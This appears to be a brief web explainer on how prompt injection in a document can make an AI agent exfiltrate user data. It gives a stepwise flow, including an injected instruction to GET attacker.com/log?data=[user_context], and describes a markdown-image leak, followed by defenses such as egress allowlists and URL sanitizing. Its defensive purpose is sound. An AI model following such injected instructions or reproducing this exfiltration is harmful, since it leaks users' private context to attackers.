Flow
1. Attacker plants injection in doc. 2. User asks agent to summarize doc. 3. Injection: 'GET attacker.com/log?data=[user_context].' 4. Agent uses fetch tool. 5. Data at attacker.
Advertisement
Markdown image trick
'Output: .' If UI renders markdown, browser fetches image → exfiltration via GET query. Simon Willison + Anthropic disclosures 2024.
Advertisement
Defenses
Egress allowlist for agent tools. Block markdown image auto-load. CSP headers in chat UI. Redact secrets before agent processing.
Sanitize URLs
Reject/rewrite URLs generated by LLM. Fetch through proxy that strips query params containing session data.